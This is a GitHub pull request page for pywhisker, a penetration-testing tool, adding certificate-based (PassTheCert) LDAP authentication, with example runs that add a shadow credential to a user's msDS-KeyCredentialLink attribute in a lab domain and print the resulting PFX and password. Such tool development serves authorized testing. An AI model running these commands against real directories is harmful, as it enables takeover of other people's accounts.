Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Added support to use PassTheCert #24

Merged
merged 3 commits into from
Nov 17, 2024
Merged

Added support to use PassTheCert #24

merged 3 commits into from
Nov 17, 2024

Conversation

JPG0mez
Copy link

@JPG0mez JPG0mez commented Oct 29, 2024

Initial PR for adding PassTheCert support to pywhisker.

This will take in a crt and key file extracted from a pfx using Certipy. It lets the user auth using Schannel via LDAP with the certificate and key.

Ex:

jp@sprocket ~> pywhisker -d thegrid.com --dc-ip 192.168.0.180 --use-schannel -crt admin.crt -key admin.key -t kflynn -a list
[*] Searching for the target account
[*] Target user found: CN=Kevin Flynn,CN=Users,DC=thegrid,DC=com
[*] Attribute msDS-KeyCredentialLink is either empty or user does not have read permissions on that attribute

jp@sprocket ~> pywhisker -d thegrid.com --dc-ip 192.168.0.180 --use-schannel -crt admin.crt -key admin.key -t kflynn -a add
[*] Searching for the target account
[*] Target user found: CN=Kevin Flynn,CN=Users,DC=thegrid,DC=com
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 1e22caec-4696-5c0a-8de4-6566fd89dea3
[*] Updating the msDS-KeyCredentialLink attribute of kflynn
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: JUuz6p3L.pfx
[*] Must be used with password: sWBNBeZM2X5XNHczUFJn
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

jp@sprocket ~> pywhisker -d thegrid.com --dc-ip 192.168.0.180 --use-schannel -crt admin.crt -key admin.key -t kflynn -a list
[*] Searching for the target account
[*] Target user found: CN=Kevin Flynn,CN=Users,DC=thegrid,DC=com
[*] Listing devices for kflynn
[*] DeviceID: 1e22caec-4696-5c0a-8de4-6566fd89dea3 | Creation Time (UTC): 2024-10-29 17:28:07.373425

Note: This commit includes an existing PR by KillingTree.
"Logger" is still misconfigured for the function "ldap3_kerberos_login".

@seliatis
Copy link

seliatis commented Nov 7, 2024

@ShutdownRepo As discussed yesterday, I tested on a box that has just been released, the PR works, I cloned its repo. Just a bug with the version of pyOppenSSL that I had to upgrade to version 22.1.0 because otherwise I'd get this error

[!] module ‘OpenSSL.crypto’ has no attribute ‘PKCS12’

as on the issue #17

@ShutdownRepo
Copy link
Owner

Merging this one as it's been tested and confirmed, and includes #22
Thank you all for the contribution!

@ShutdownRepo ShutdownRepo merged commit b0d8e46 into ShutdownRepo:main Nov 17, 2024
1 check passed
This was referenced Nov 17, 2024
Closed
Closed
Closed
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
3 participants
@JPG0mez @seliatis @ShutdownRepo